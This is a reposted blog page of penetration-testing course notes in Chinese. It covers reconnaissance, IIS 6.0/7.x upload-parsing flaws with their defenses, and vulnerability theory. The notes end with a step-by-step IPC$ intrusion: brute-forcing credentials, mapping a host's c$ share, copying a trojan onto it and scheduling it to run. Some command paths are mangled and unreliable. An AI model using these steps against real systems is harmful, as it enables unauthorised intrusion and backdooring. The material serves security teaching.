我是靠谱客的博主 淡定小土豆,最近开发中收集的这篇文章主要介绍十六章、渗透测试(千峰网络安全300课时笔记)十六章、渗透测试,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

十六章、渗透测试

引言:千峰网络安全300课时学习,视频学习过程中的学习笔记。笔记中借鉴了CSDN博主「beglage」文章中的图片记录,感谢千峰网络的视频和beglage博主的博文笔记记录分享。

B站千峰网络安全开源课程视频


目录

渗透测试

渗透测试

1、信息收集

nslookup whois

nslookup命令
     Nslookup是一个命令行工具,用于监控网络中的DNS服务器是否能够正确实现域名解析。功能是查询DNS记录,看域名解析是否正常,网络故障时诊断网络问题。
whois命令
       域名查询一般指查询域名的 whois注册信息,域名WHOIS是当前域名系统中不可或缺的信息服务。使用域名上网时,很多用户都想了解更多的域名和域名服务器的详细信息,所以才会使用WHOIS。对于域名注册机构来说,WHOIS通常用于确认域名数据是否在域名注册机构正确注册。直观来看,WHOIS是链接到域名数据库的搜索引擎,域名数据库一般是网络信息中心(NIC)提供和维护的名称服务之一。


2、扫描漏洞

namp = ip范围 端口 80(IIS,apache)

scanpot:ScanPort 端口扫描工具是一个小巧实用的网络端口扫描工具,可以利用此类工具进行端口扫描的定位。

高级扫描:如IIS漏洞2003-IIS6.0 2008-IIS7.0

解析IIS6.0漏洞
(1)以*.asp为命名的文件夹下的任何文章会被解析为.asp格式
在这里插入图片描述(2).asp;.jpg这种格式的文件,后缀会被;所截断,分号后的被忽略,文件被当做asp执行;
在这里插入图片描述
在IIS6.0下,
.asa *.cer .cdx也会被解析,和.asp一样,比如你传lcx.asp与传lcx.cer一样的

这里有个问题说一下,如果上传的文件被重命名了,也就是说文件名不可控,比如以上传时间为名字,用不了文件名截断即(2)点,可以往文件夹名称解析即(1)点方向靠;

所以防御的方向就是:

(1)在服务器上限制上传目录的执行权限不让他执行脚本

(2)也不允许新建目录防止出现上文说的文件夹名称解析漏洞

(3)将上传的文件重命名,什么随机数,时间戳都用上

漏洞IIS7.0/7.5解析

与PHP配合,访问phpinfo.php,看一眼server API写的啥
在这里插入图片描述
如果如图中所示,FastCGI开着,则会出现在任意文件名后加上/.php,此文件会被当做PHP文件解析

例如 lcx.txt/.php => lcx.php

IIS7.0/7.5防御方法
防御办法除了与IIS6.0相同的思路,还要把php.ini中这一项
在这里插入图片描述
去除注释,值改成0


3、漏洞利用

       漏洞[或脆弱性(英语:Vulnerability),是指计算机系统安全方面的缺陷,使得系统或其应
用数据的保密性、完整性、可用性、访问控制等面临威胁。

       在《GB/T 25069-2010 信息安全技术 术语》,将脆弱性定义为“资产中能被威胁所利用的弱
点”。

       许多安全漏洞是程序错误导致的,此时可叫做安全错误(英语:Security bug),但并不是所有的安全隐患都是程序安全错误导致的。

原因
复杂:大型的复杂系统会增加缺陷以及未预期文件系统权限的可能性。
熟悉:使用常见、著名的程序,软件,操作系统及硬件,若没有经常更新系统,容易被攻击者找到缺陷进行攻击。
互连:越来越多的实体连接、特权、端口、通信协议以及服务,每一项都会增加系统被攻击的可能性。
密码管理缺陷:电脑用户的密码若强度不足,可能会用暴力法破解。电脑用户将密码放在电脑软件可以访问的地方。用户在不同的程序和网站上使用相同的密码使用默认允许政策的操作系统,给每一个用户和软件完整的权限可以访问整台电脑。

       操作系统的缺陷让病毒以及恶意软件可以以管理者的身份执行指令浏览网站;有些网站可能会有有害的间谍软件或广告软件,在浏览后会自动安装在电脑中。在浏览这些网站后,电脑即受到这些软件的影响,可能会将个人资料发送给第三方程序错误:软件开发者在软件中留下了可利用的漏洞,攻击者可以利用这个漏洞来滥用应用程序不适当的输入验证:程序假设所有用户的输入都是安全的,没有检查用户输入的程序,可能会因为无意或刻意的输入而造成问题,例如缓冲区溢出、SQL注入等问题没有从过去的错误中记取教训:例如大部分在IPv4通信协议软件上被发现的漏洞,又在IPv6版本中的重复出现研究已经证实大部分信息系统中,最脆弱的部分是用户、操作者、设计者或是其他的人;因此在分析时,人可能有不同的角色,例如资产、威胁、信息资源等。社会工程学是目前越来越受重视的安全议题。

4、提权(shell(命令行cmd)环境、桌面环境、最高权限)
5、毁尸灭迹
6、留后门
7、渗透测试报告

测试流程

手工测试端口号开放:

telnet IP 地址 测试端口

445漏洞利用之一IPC$:

1、scanport 扫描445端口

2、进行暴力破解:NTscan

3、


net use f: \10.1.1.2ipc$ 密码 /user:用户
=================================================
net use f: \10.1.1.2share 密码 /user:用户
net use * /del
net use * /del
net use f: \10.1.1.2c$ 密码 /user:用户
=================================================

4、制作木马

5、植入木马(留后门)

copy d:heihei.exe \10.1.1.2c$

6、设计计划任务自动执行木马:

net time \10.1,1.2
at \10.1.1.2 11:11 "c:heihei.exe"

7、等待被攻击对象上线

最后

以上就是淡定小土豆为你收集整理的十六章、渗透测试(千峰网络安全300课时笔记)十六章、渗透测试的全部内容,希望文章能够帮你解决十六章、渗透测试(千峰网络安全300课时笔记)十六章、渗透测试所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(72)

评论列表共有 0 条评论

立即
投稿
返回
顶部